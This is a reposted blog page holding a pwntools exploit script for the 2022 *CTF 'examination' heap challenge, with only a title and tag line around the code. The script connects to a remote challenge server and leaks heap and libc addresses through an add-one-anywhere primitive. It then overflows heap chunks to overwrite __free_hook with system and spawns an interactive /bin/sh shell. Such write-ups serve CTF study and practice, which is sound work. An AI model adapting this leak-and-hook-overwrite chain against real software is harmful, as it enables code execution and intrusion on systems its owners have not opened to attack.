2022 *CTF examination
作者:互联网
exp
from pwn import*
context.log_level = 'debug'
context.arch = 'amd64'
#s = process('./examination')
s = remote('124.70.130.92',60001)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def init_role(role):
s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role))
def add_s(num):
s.sendlineafter(b'choice>> ', b'1')
s.sendlineafter(b'enter the number of questions: ', str(num))
def give_score():
s.sendlineafter(b'choice>> ', b'2')
def write_view(c,index,size,comment):
s.sendlineafter(b'choice>> ', b'3')
s.sendlineafter(b'which one? > ', str(index))
if(c):
s.sendafter(b'enter your comment:\n', comment)
else:
s.sendlineafter(b'please input the size of comment: ', str(size))
s.sendafter(b'enter your comment:\n', comment)
def call_parent(index):
s.sendlineafter(b'choice>> ', b'4')
s.sendlineafter(b'which student id to choose?', str(index))
def change_role(role):
s.sendlineafter(b'choice>> ', b'5')
s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role))
def t_exit():
s.sendlineafter(b'choice>> ', b'6')
def test():
s.sendlineafter(b'choice>> ', b'1')
def check(ptr):
s.sendlineafter(b'choice>> ', b'2')
s.sendafter(b'add 1 to wherever you want! addr: ', ptr)
def pray():
s.sendlineafter(b'choice>> ', b'3')
def mode(p,score,mode):
s.sendlineafter(b'choice>> ', b'4')
if(p):
s.sendlineafter(b'enter your pray score: 0 to 100\n', str(score))
else:
s.sendafter(b'enter your mode!\n', mode)
def change_id(index):
s.sendlineafter(b'choice>> ', b'6')
s.sendlineafter(b'input your id: ', str(index))
#0x5080
init_role(0)
add_s(1) # 0
add_s(1) # 1
add_s(1) # 2
write_view(0,0,0x80,b'a'*0x80)
write_view(0,1,0x80,b'a'*0x80)
write_view(0,2,0x80,b'a'*0x80)
change_role(1)
pray()
change_id(2)
pray()
change_role(0)
give_score()
change_role(1)
change_id(2)
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x340
success('heap_base=> '+hex(heap_base))
ptr = heap_base + 0x1f
success('ptr1=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))
change_role(0)
add_s(1) # 3
write_view(0,3,0x80,b'a'*0x80)
call_parent(1)
change_role(1)
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x2a0
success('heap_base=> '+hex(heap_base))
ptr = heap_base + 0x2e2
success('ptr2=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ecbe0
success('libc_base=>' +hex(libc_base))
system = libc_base + libc.sym['system']
change_role(0)
payload = b'/bin/sh\x00' + b'a'*0x80 + p64(0x91) + b'b'*0x80 + p64(0x90)*2 + b'c'*0x88
payload+= p64(0x31) + p64(heap_base + 0x570) + b'\x00'*0x20
payload+= p64(0x21) + p64(0x1) + p64(libc_base + libc.sym['__free_hook'])
write_view(1,0,0x80,payload)
write_view(1,3,0x80,p64(system))
call_parent(0)
#gdb.attach(s)
s.interactive()
标签:0x80,choice,CTF,base,role,2022,sendlineafter,examination,def 来源: https://www.cnblogs.com/pwnfeifei/p/16250158.html